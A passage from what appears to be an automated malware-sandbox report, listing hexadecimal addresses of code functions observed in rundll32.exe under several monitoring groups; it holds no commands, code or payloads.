                      Source: C:\Windows\SysWOW64\rundll32.exe  Code functions (21_2): 050F457F, 050EED71, 050F53C0, 050ECDD8, 050E542D, 050F9C76, 050F8684, 050EE2BE, 050E80E3, 050F030B, 050E7D07, 050EF100, 050E8F1B, 050E2B2B, 050E1D2B, 050EAB26, 050E773B, 050F2938, 050E4F4C, 050E7547, 050F9B59, 050EBD6C, 050EF96A, 050ED77E, 050E918D, 050EDB9E, 050EB394, 050FABAE, 050E2FA7, 050E43BC, 050EF3B2, 050ECBB1, 050E83CE, 050F19CB, 050F83C9, 050F9DC4, 050E5FD2, 050F49EF, 050F8FE8, 050E69FD, 050E13FB, 050E17FB, 050EBFF4, 050EA7F1, 050F300F, 050E7E0C, 050ED405, 050E3A00, 050F961A, 050F2422, 050F0820, 050EC232, 050F0E49, 050E6248, 050EA05D, 050F4C55, 050F346E, 050F066A, 050EEA68, 050E5A60, 050E3C7E, 050F9A7E, 050FB07B, 050F3689, 050E7A87, 050E4685, 050F7083, 050F229F, 050F2C97, 050E2290, 050E40AB, 050F12A3, 050FA6B2, 050EFEC2, 050E64D8, 050F38D2, 050EF6E3
                      Source: C:\Windows\SysWOW64\rundll32.exe  Code functions (21_2): 70331CE0, 7033A00B, 70336987, 70339A89, 70347329, 70346B72, 7033A392, 703393C0, 7033946D, 70339D50, 703397DF
                      Source: C:\Windows\SysWOW64\rundll32.exe  Code functions (24_2): 04559C76, 0454542D, 045480E3, 04558684, 0454E2BE, 0454ED71, 0454D77E, 0455457F, 04547D07, 04542B2B, 0454CDD8, 045553C0, 045483CE, 04554C55, 0454A05D, 04550E49, 04546248, 04543C7E, 04559A7E, 0455B07B, 04545A60, 0455346E, 0454EA68, 0455066A, 0455961A, 0454D405, 04543A00, 04547E0C, 0455300F, 0454C232, 04550820, 04552422, 045538D2, 045464D8, 0454FEC2, 0454F6E3, 04552C97, 04542290, 0455229F, 04544685, 04547A87, 04557083, 04553689, 0455A6B2, 045512A3, 045440AB, 04559B59, 04547547, 04544F4C, 0454BD6C, 0454F96A, 04548F1B, 0454F100, 0455030B, 04552938, 0454773B, 0454AB26, 04541D2B, 04545FD2, 04559DC4
                      Source: C:\Windows